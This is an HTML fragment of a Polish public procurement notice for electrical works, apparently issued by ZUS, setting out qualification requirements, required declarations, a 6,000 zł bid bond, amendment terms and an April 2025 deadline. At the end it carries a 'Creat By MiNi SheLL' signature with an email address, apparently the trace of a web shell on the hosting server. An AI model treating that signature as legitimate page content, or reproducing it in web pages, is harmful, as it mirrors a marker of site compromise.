z Załącznikiem nr 8 do SWZ).<br/>dysponuje co najmniej jedną osobą na okres udziału w wykonywaniu zamówienia, posiadającą odpowiednie kwalifikacje<br/>zawodowe i uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń elektrycznych i elektroenergetycznych<br/>dysponuje co najmniej jedną osobą, która będzie wykonywać zamówienie, posiadającą świadectwo kwalifikacji do<br/>zajmowania się eksploatacją urządzeń, instalacji i sieci do 1 kV, na stanowisku „eksploatacji”;<br/>dysponuje co najmniej 1 osobą, która będzie wykonywać zamówienie, posiadającą świadectwo kwalifikacji do zajmowania<br/>się eksploatacją urządzeń, instalacji i sieci do 1 kV, na stanowisku „dozoru”. Zamawiający dopuszcza dysponowanie jedną<br/>osobą posiadającą obydwa wymagane świadectwa kwalifikacji tj. na stanowisku „eksploatacji” oraz „dozoru”.<br/>Uwaga 1:<br/>Osoba wskazana w pkt SWZ 4.1.1.4.2 powinna posiadać uprawnienia budowlane zgodnie z ustawą z dnia 7 lipca 1994 r.<br/>Prawo budowlane (tj.: Dz. U. z 2021 r., poz. 2351 ze zm.) oraz Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29<br/>kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. z 2019 r., poz. 831) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje<br/>techniczne w budownictwie, określone w art. 12 ust. 1 ustawy, mogą również wykonywać osoby, których odpowiednie<br/>kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią<br/>przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (tj.: Dz. U. z 2021 r., poz. 1646).<br/>Uwaga 2:<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych i doświadczenia, wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane, do realizacji których te zdolności są wymagane. W takim przypadku, wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni<br/>wykonawcy (zgodnie z załącznikiem nr 8 do SWZ).<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek dotyczący kwalifikacji zawodowych lub doświadczenia może być spełniony przez jednego z Wykonawców lub łącznie przez Wykonawców występujących wspólnie w niniejszym postępowaniu. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami, w wykazie robót budowlanych powinien wykazać tylko te roboty, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenia, dokumenty oraz pełnomocnictwa składane wraz z ofertą za pośrednictwem Platformy zakupowej:<br/>aktualne na dzień składania ofert oświadczenie w zakresie wskazanym w Załączniku nr 6 do SWZ. Informacje zawarte w<br/>oświadczeniu będą stanowiły wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w<br/>postępowaniu;<br/>oświadczenie wstępne należy złożyć pod rygorem nieważności, w formie elektronicznej, tj. w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym, lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>oświadczenie wstępne należy dołączyć do oferty w formie lub postaci określonej w pkt 4.4.1.1.11. SWZ, a następnie, wraz z plikami<br/>stanowiącymi ofertę oraz załącznikami do oferty, skompresować do jednego pliku archiwum .zip;<br/>W przypadku składania, uzupełnienia lub poprawienia oświadczenia wstępnego na podstawie art. 128 ust. 1 ustawy, oświadczenie<br/>wstępne w formie, o której mowa w pkt 4.4.1.1.11. SWZ, należy przesłać poprzez Platformę zakupową na adres:<br/>http://portal.smartpzp.pl/zus w ramach danego postępowania;<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie wstępne, o którym mowa w pkt 4.4.1.1.11.<br/>SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia. Zasady dotyczące składania oraz formy oświadczenia wstępnego<br/>określone w pkt 4.4.1.1 SWZ stosuje się.<br/>Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia<br/>oraz spełniania, w zakresie w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, składa oświadczenia wstępne, o<br/>których mowa w pkt 4.4.1.1.1. SWZ dotyczące tych podmiotów. Zasady dotyczące składania oraz formy oświadczenia wstępnego<br/>określone w pkt 4.4.1.1.1 SWZ stosuje się.<br/>Wykonawca, który korzysta z podwykonawców, w celu wykazania braku istnienia wobec nich podstaw wykluczenia składa<br/>oświadczenie wstępne, o którym mowa w 4.4.1.1. SWZ dotyczące tych podmiotów. Zasady dotyczące składania oraz formy<br/>oświadczenia wstępnego określone w pkt 4.4.1.1.1.SWZ stosuje się.<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia (sporządzone zgodnie z załącznikiem nr 9 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że<br/>Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów - jeżeli Wykonawca polega na<br/>zasobach lub sytuacji podmiotu trzeciego;<br/>W przypadku, gdy Wykonawcę reprezentuje pełnomocnik – pełnomocnictwo określające jego zakres, podpisane przez osobę/y<br/>upoważnione do reprezentacji wskazane we właściwym rejestrze, z którego wynika prawo do podpisania oferty oraz do podpisania<br/>innych dokumentów składanych wraz z ofertą a następnie wraz z plikami stanowiącymi ofertę skompresowane do jednego pliku<br/>archiwum .zip;<br/>W przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia, pełnomocnictwo określające zakres<br/>umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu;<br/>oświadczenie wykonawców wspólnie ubiegających się o zamówienie, z którego wynika, które dostawy wykonają poszczególni<br/>wykonawcy, sporządzone zgodnie ze wzorem zamieszczonym w Załączniku nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">O udzielenie zamówienia<br/>mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 108 ustawy.<br/>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> WYSOKOŚĆ I ZASADY WNIESIENIA WADIUM określono w art. 3 SWZ<br/>Wykonawca składający ofertę jest zobowiązany wnieść wadium w wysokości 6 000,00 zł (słownie: sześć tysięcy złotych 00/100).<br/><br/>Wadium może być wniesione w jednej lub kilku następujących formach:<br/>pieniądzu,<br/>gwarancjach bankowych,<br/>gwarancjach ubezpieczeniowych,<br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b pomoc finansowa udzielana przez Agencję ust. 5 pkt 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i<br/>1572) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie wstępne, o którym mowa w pkt<br/>4.4.1.1.11. SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać<br/>spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. Zasady dotyczące składania oraz<br/>formy oświadczenia wstępnego określone w pkt 4.4.1.1 SWZ stosuje się.<br/>Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw<br/>wykluczenia oraz spełniania, w zakresie w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, składa<br/>oświadczenia wstępne, o których mowa w pkt 4.4.1.1.1. SWZ dotyczące tych podmiotów. Zasady dotyczące składania oraz<br/>formy oświadczenia wstępnego określone w pkt 4.4.1.1.1 SWZ stosuje się.<br/>Wykonawca, który korzysta z podwykonawców, w celu wykazania braku istnienia wobec nich podstaw wykluczenia składa<br/>oświadczenie wstępne, o którym mowa w 4.4.1.1. SWZ dotyczące tych podmiotów. Zasady dotyczące składania oraz formy<br/>oświadczenia wstępnego określone w pkt 4.4.1.1.1.SWZ stosuje się.<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia (sporządzone zgodnie z załącznikiem nr 9 do SWZ) lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów - jeżeli<br/>Wykonawca polega na zasobach lub sytuacji podmiotu trzeciego;<br/>W przypadku, gdy Wykonawcę reprezentuje pełnomocnik – pełnomocnictwo określające jego zakres, podpisane przez<br/>osobę/y upoważnione do reprezentacji wskazane we właściwym rejestrze, z którego wynika prawo do podpisania oferty oraz<br/>do podpisania innych dokumentów składanych wraz z ofertą a następnie wraz z plikami stanowiącymi ofertę<br/>skompresowane do jednego pliku archiwum .zip;<br/>W przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia, pełnomocnictwo<br/>określające zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu;<br/>oświadczenie wykonawców wspólnie ubiegających się o zamówienie, z którego wynika, które dostawy wykonają<br/>poszczególni wykonawcy, sporządzone zgodnie ze wzorem zamieszczonym w Załączniku nr 8 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Z zastrzeżeniem wyjątków przewidzianych Umową zmiany treści Umowy dokonywane będą za zgodą obu Stron aneksem<br/>do Umowy w formie pisemnej pod rygorem nieważności.<br/>2. Zmiana postanowień niniejszej Umowy w stosunku do treści Oferty Wykonawcy, na podstawie której dokonano wyboru<br/>Wykonawcy jest możliwa w przypadkach opisanych w ust. 3, z zastrzeżeniem, iż zmiany te nie wykraczają poza określenie<br/>przedmiotu zamówienia zawarte w Opisie Przedmiotu Zamówienia oraz Strony Umowy wyraziły zgodę na wprowadzenie<br/>zmian. Wystąpienie którejkolwiek z okoliczności wskazanych w niniejszym paragrafie nie stanowi zobowiązania Stron do<br/>wprowadzenia zmiany.<br/>3. Niezależnie od treści innych zapisów Umowy, zmiana postanowień Umowy w stosunku do treści Oferty Wykonawcy jest<br/>możliwa w przypadku wystąpienia któregokolwiek z następujących przypadków:<br/>1) zmiana terminu realizacji przedmiotu umowy spowodowana:<br/>a) siłą wyższą uniemożliwiającą wykonanie przedmiotu umowy zgodnie z Umową<br/>b) przerwaniem prac przez właściwe organy administracji rządowej i samorządowej albo jako wykonanie prawomocnego<br/>orzeczenia sądu, za co nie można przypisać winy Wykonawcy, ( o ilość dni zaistniałej okoliczności)<br/>c) koniecznością wykonania zamówień których, zamawiający nie mógł przewidzieć a wymagane jest ich natychmiastowe<br/>wykonanie, albo wykonania części robót inną technologią niż założona w ofercie Wykonawcy.(o czas niezbędny do<br/>wykonania tych prac)<br/>4. Każda ze Stron powołując się na okoliczności, o których mowa w ust. 3 pkt 1) zobowiązana jest poinformować drugą<br/>Stronę o zaistniałym fakcie w terminie 3 dni od dnia jego zaistnienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa https:/portal.smartpzp.pl/zus</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-03 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com